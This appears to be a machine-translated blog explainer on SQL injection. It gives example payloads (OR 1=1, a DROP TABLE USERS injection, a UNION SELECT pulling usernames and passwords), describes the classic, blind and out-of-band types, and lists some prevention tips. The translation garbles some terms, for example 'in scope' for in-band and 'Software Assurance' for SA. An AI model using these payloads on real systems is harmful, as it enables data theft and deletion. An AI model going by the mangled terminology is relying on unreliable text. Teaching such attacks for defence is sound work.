What is SQL Injection: How It Works, Examples, and Types

Data is one of the most important components of an information system. Organizations use web applications powered by databases to obtain data from customers. SQL stands for Structured Query Language. It is used to retrieve and manipulate data in the database. However, because of this, hackers have discovered a new type of attack and one of the attacks is SQL Injection.

You may not know what SQL Injection (SQLI) is or how it works, but you do know about its victims. Target, Yahoo, Zappos, Equifax, Epic Games, TalkTalk, LinkedIn and Sony Pictures. All of these companies have been hacked by cybercriminals using SQL injection.

as said I fitSQL Injection has become a common problem with websites that rely on databases. It is easy to spot and exploit this flaw easily.

Read also: What is an XSS (Cross-Site Scripting) attack?

What is SQL injection

SQL injection (SQLI) is a type of attack that cybercriminals use to exploit software vulnerabilities in web applications. This allows attackers to see data that they would normally not be able to recover. This includes data about other users, or other data that the app itself can access. In many cases, an attacker can modify or delete this data, causing ongoing changes to the app’s content or behavior.

In some cases, an attacker can escalate a SQL injection attack to disable the primary server or other back-end infrastructure, or perform a denial of service attack.

Read also: What is a DDOS attack and how to avoid it

How does SQL injection work?

SQL injection is a major concern when developing web applications. This happens when an application receives malicious user input and then uses it as part of an SQL statement to query the backend database.

An attacker can enter SQL control characters and command keywords (eg single quotes (‘), double quotes (“), equals (=), comments (- -), etc.) to change the query structure. Allows the use of these control characters with SQL commands Common (eg, SELECT, FROM, DELETE, etc.) access or retrieve data items from the back-end database server.

A successful attack requires the web application to include the attacker’s malicious code in the SQL statement. Malicious code usually comes from untrusted sources. In some cases, internal system databases can also be a source of malicious data. When malicious SQL statements are executed on the back-end database, an attacker can modify or access the database. It depends on how the attacker generated the malicious data.

SQL injection example

Attackers seeking to perform SQL injections tamper with standard SQL queries to exploit vulnerabilities for unverified entry into the database. There are many ways to carry out this attack.

For example, the above entry, which pulls information on a specific product, can be changed to http://www.eniaga.com/items/items.asp?itemid=999 or 1 = 1.

As a result, the related SQL query looks like this:

SELECT ItemName, ItemDescription 
FROM Items 
WHERE ItemNumber = 999 OR 1=1

And since the statement 1 = 1 is always true, the query returns all product names and descriptions in the database, even those you might not be eligible to access.

Attackers can also take advantage of improperly filtered characters to modify SQL commands, including using a semicolon to separate two fields.

For example, enter this http://www.eniaga.com/items/iteams.asp?itemid=999; Users of the DROP table will perform the following SQL query:

SELECT ItemName, ItemDescription 
FROM Items 
WHERE ItemNumber = 999; DROP TABLE USERS

As a result, the entire user database can be deleted.

Another way to handle SQL queries is to use a UNION SELECT statement. It combines two unrelated SELECT queries to retrieve data from different database tables.

For example, entering http://www.eniaga.com/items/items.asp?itemid=999 UNION SELECT username and password from users leads to the following SQL query:

SELECT ItemName, ItemDescription 
FROM Items 
WHERE ItemID = '999' UNION SELECT Username, Password FROM Users;

Using the UNION SELECT clause, this query combines requests for 999 item names and descriptions with other requests that pull the names and passwords for each user in the database.

Types of SQL injection types

SQL injections can be classified into three main categories

  • SQL injection in scope
  • Deductive SQL injection
  • SQL injection out of scope

1. SQLI In Scope (Classic SQLI)

In-domain SQL injection is the most common and easily exploitable SQL injection attack. In-scope SQL injection occurs when an attacker can use the same communication channel to launch an attack and collect the results. For example, an attacker can use an HTTP connection to propagate the attack on the backend and get the results on the same channel.

There are two main types of in-scope SQL injection

  1. SQLI Error-Based: Error-based SQLI is an in-scope SQL injection technique that relies on error messages thrown by the database server to obtain information about the database structure. In some cases, error-based SQL entry alone is sufficient for an attacker to enumerate the entire database.
  2. SQLI Federation Dependent: Union-based SQLI is an in-scope SQL injection technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result that is then returned as part of an HTTP response.

2. Inferential SQLI (Blind SQLI):

Inferential SQL injection, unlike in-scope SQLI, may take longer for attackers to exploit, however, it is just as dangerous as other forms of SQL injection. In an SQLI inferential attack, no data is actually transmitted through the web application and the attacker will not be able to see the results of an in-domain attack (which is why such attacks are often referred to as “blind SQL injection attacks”).

Alternatively, the attacker can rebuild the database structure by sending the payload, and monitoring the response of the web application and the resulting behavior of the database server. There are two types of inferential SQL injection, which are Blind-Boolean-based SQLI and time-blind-based SQLI.

  1. SQLI is blind based on Boolean (content based): Boolean SQL injection is a deductive SQL injection technique that relies on sending SQL queries to the database to force the application to return different results depending on whether the query returns TRUE or FALSE results. Depending on the result, the content in the HTTP response will change, or remain the same. This allows the attacker to infer whether the payload used returns true or false, even though no data is returned from the database.
  2. SQLI Time-Based Blind: Time-based SQL injection is a deductive SQL injection technique that relies on sending SQL queries to the database to force the database to wait a certain amount of time (in seconds) before responding. The response time will show the attacker whether the query result is true or false. Depending on the result, the HTTP response with a delay will be returned or returned immediately. This allows the attacker to infer whether the payload used returns true or false, even though no data is returned from the database.

3. SQL out of scopeI

SQL injection out of scope is not uncommon, in large part because it depends on which features are enabled on the database server that the web application is using. An out-of-band SQL injection occurs when an attacker cannot use the same channel to launch an attack and collect the results. Out-of-band techniques provide attackers with an alternative to time-based inference techniques, especially if the server response is very unstable (which makes time-based inferential attacks unreliable).

How to prevent SQL injection attacks?

Use the following tips below to help prevent SQL injection attacks on your web applications.

  • Restricting Application Privileges: Restrict user credentials so that only rights that the application needs to function are used. Each successful SQL injection attack will run in the context of the user’s credentials. While restricting privileges won’t prevent SQL injection attacks directly, it will make them more difficult to execute.
  • Strong SA Password Policy: Attackers often request administrator account functions to use certain SQL commands. It is much easier to “force” the SA (sysadmin) password if it is weak, and it will increase the chances of a successful SQL injection attack. Another option is to not use a Software Assurance account at all, and instead create an account that is intended for a specific purpose.
  • Consistent error message schema: Make sure to provide as little information as possible to the user when an error occurs in the database. Do not reveal the entire error message. Error messages must be handled on the web and application servers. When the web server encounters a processing error, it must respond with a public web page, or redirect the user to a standard site. You must not disclose debug information or other details that may be useful to a potential attacker. Application servers, such as WebSphere, are often installed with error messages or debug settings enabled by default. See the application server documentation for information about hiding the error message.

conclusion

So what is SQL injection? Simply put, SQL Injection is an attack on a web application, not the web server or the operating system itself. As the name implies, SQL injection is the process of adding unexpected SQL commands to a query, thereby manipulating the database in a way that the database administrator or developer would not want. If successful, the data can be extracted, modified, inserted, or deleted from the database server used by the compromised web application. In certain circumstances, SQL Injection can be used to take full control of the system.


Lots of articles What is SQL injection: How it works, examples, and types. Look forward to other interesting articles and don’t forget to share this article with your friends. Thank you…

Leave a Comment

/* */